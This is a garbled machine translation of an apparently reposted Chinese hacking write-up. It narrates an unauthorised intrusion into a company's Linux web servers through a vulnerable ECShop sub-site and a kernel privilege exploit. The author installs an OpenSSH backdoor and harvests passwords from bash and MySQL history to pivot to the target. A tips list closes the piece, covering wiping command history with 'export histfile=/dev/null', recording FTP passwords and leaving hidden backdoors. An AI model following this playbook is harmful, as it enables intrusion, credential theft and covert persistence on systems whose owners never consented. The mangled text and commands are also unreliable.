Small count one time Linux under Infiltration method

This article turns from 91ri

Casing

Target domain name is xx.com

Our goal is the major stations, so the main station is generally very safe, so directly looking for two level directory, luck can find some open-source CMS, Luck better find a dede what, then ...

We directly enumerate his domain name, first look at the sub-station, because the relatively big guess he is the intranet, first to step down the intranet machine again.

Analyze and get sub-station permissions

Enumeration of the next sub-station is quite a lot of, the result looked at the next 10 the server has a Ecshop program, house is on top, any ecshop down.

Turn down the database file, good luck, is root.

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">uname-a</textarea>

1

uname -a

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Linux 2.6.32-71.el6.i686 #1 SMP Fri Nov 04:17:17 GMT i686 i686 i386 gnu/linux</textarea>

1	Linux 2.6.32-71.el6.i686 #1 SMP Fri, 04:17:17 GMT, i686 i686 i386 gnu/linux

The kernel has a loophole, directly upload exp right.

After analysis, the host is outside the network rather than the intranet, our goal is *.*.*.*.8, has the authority of the machine is *.*.*.*10

Did a openssh back door, that is, root double password, manage a password our back door a password, does not affect the management of that password. (available on-line, downloadable by yourself)

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">cat/etc/issue</textarea>

1	Cat /etc/issue

CentOS Linux Release 6.0 (Final)
Kernel R on a m

I would like to do a Pam password record, but there is no back door support 6.0 on hand.

Depth

After analysis, the website 7 and 8 do the load or rsync synchronization, most of the load is always synchronized.

See what the next process is running

Default <textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Ps-aux</textarea>

1

PS -aux

In addition to Apache MySQL, it runs a

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">/usr/sbin/vsftpd</textarea>

1	/usr/sbin/vsftpd

Open the FTP service, this can do an FTP password record, but too lazy to wait for him online, first continue to engage in other. (91ri.org Note: In general, an enterprise responsible for the maintenance of the network in the case of the administrator, the password basic kill, in the long-term infiltration of more than a few passwords and analysis often more than a multiplier. ）

View the administrator's history, and perhaps find sensitive information

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Cat. Bash_history |</textarea> more

1	Cat . Bash_history | More

Discovery has been contacted with Target server 8 15

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">SCP-RP ROOT@X.X.X.8:/ETC/HTTPD/CONF/ETC/HTTPD/SCP-RP Root@x.x.x.15:/var/lib/mysql/appcms/var/lib/mysqlssh x.x.x.13</textarea>

123	SCP -rp root@x. X. X. 8:/etc/httpd/conf /etc/httpd/ scp -RP root@x. X. X. 15:/var/lib/mysql/ appcms /var/lib/mysql ssh x. X. X. -

Many Linux administrators feel that the Linux system itself is safe, but the security is not very concerned about, all like to do SSH trust connection, it is suspected that the server did a trust connection

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">[root@10 ~]# ls. Ssh/authorized_keys known_hosts</textarea>

12	[root@ ~]# ls. ssh/ authorized_keys known_hosts

Default <textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Cat. ssh/known_hostsx.x.x.13 Ssh-rsa baaab3nzac1yc2eaaaabiwaaaqeawcxcmgxzxoeiuhkhasi9dw9kilxxpdcsifv/ eyble1jcks44tljppgmeqvbvbqj4fytrescpgrwwolrmaecye17mdnezdaorq392ucmdulg3vz4zzkh8+ 9hfrnnlmbrrqpatifwwxlkushoiqbrv+pgf49v5vykqyzm/01fbhtzdscfizsxeyl/oisuzpb2l9qzp+ 0xinwf1rrcv78tv2vsn74yin47ieqifk8lmfhoev1xa31/vkmfx8c8stmhedomebafxo3wzbq/ xj5ftrrfj1wyo06lgojgp6svpqor8zm8itpdtwrg2nmwsrzc6egopx1yi9cv23nxzam/b/q==</textarea>

12

cat . SSH/known_hosts X.X.X.13 Ssh-RsaBaaab3nzac1yc2eaaaabiwaaaqeawcxcmgxzxoeiuhkhasi9dw9kilxxpdcsifv /eyble1jcks44tljppgmeqvbvbqj4fytrescpgrwwolrmaecye17mdnezdaorq392ucmdulg3vz 4zzkh8+9hfrnnlmbrrqpatifwwxlkushoiqbrv+< Span class= "crayon-v" >pgf49v5vykqyzm/01fbhtzdscfizsxeyl/oisuzpb2l9qzp+ 0xinwf1rrcv78tv2vsn74yin47ieqifk8lmfhoev1xa31/ Vkmfx8c8stmhedomebafxo3wzbq/ Xj5ftrrfj1wyo06lgojgp6svpqor8zm8itpdtwrg2nmwsrzc6egopx1yi9cv23nxzam/ B/q==

But after reading sad, this host only with 13 have trust connection, so then SSH to 13. Although not the main station, but may be able to collect some management information directly to get to the target.

Circuitous

And then he made a back door after he got the target.

Still continue to see the Management History command, by the way can also search under what. sh file, some management in order to facilitate the write shell script files, and there are always good things.

Take a look at the MySQL operation record.

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Cat. Mysql_history</textarea>

1	Cat . Mysql_history

Found it

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">Grant All privileges on * * to ' root ' @ '% ' identified by ' ***vrlmm ' with Grant option;flush privileges;</textarea>

12	< Span class= "crayon-e" >grant all privileges On *. * to ' root ' @ '% ' identified by ' ***vrlmm ' with grant option flush privileges

Suddenly found that the MySQL password is the same, guess the target server is also this password, immediately nmap scan under 8 has not opened 3306, scan found that sure is turned on, and do use the same password. (91ri.org: confirmed that before, a person tube a machine and tube 10 tube 100 sets of practice is not the same, after all, it is not always a single host to go through the password book it? ）

Found a record in the first 10 servers

Default<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">SCP-RP root@x.x.x.8:/etc/httpd/conf/etc/httpd/</textarea>

1	< Span class= "crayon-v" >scp -RP root@x. X. X. 8:/etc/httpd/conf /etc/httpd/

Make sure he Apache is the default installed direct read path guide shell

Fruitful

Summarize

• When a server is taken down, please immediately execute export histfile=/dev/null after logging in so that the commands we operate will not be recorded. Bash_history

• can turn down mysql_history. bash_history

• Ls-al See what's hidden in the root directory, such as. SSH, VNC, and so on. VNC is cool, you know.

• You can see. ssh/the following SSH connection records, etc., you can also look at the global variables file or something.

• Find what shell script files are on the server, many have rsync synchronization scripts or something

• Check the next process, if at least you know a bit about Linux. If there is rsync on the host, there is basically no problem. (PlainText password)

• In the intranet environment words do not know the main station target can nslookup domain name to see whether in an intranet and so on.

• Intranet environment If there is running FTP service to do backdoor record FTP password, collect information, wait for management on-line.

• Use Tcpdump

• Leave a hidden back door.

• Get permission to do the above work on other machines can be collected information, it is recommended to use Nmap.

91ri.org: The article wrote quite chaotic, a little tidy up a bit, the author of the idea is good, it is worth just learning the Linux infiltration of the classmate learning. By the way recommend the relevant Linux penetration tips article: "Summary of some of the Linux infiltration skills" "nmap in the actual combat advanced usage"

Small count one time Linux under Infiltration method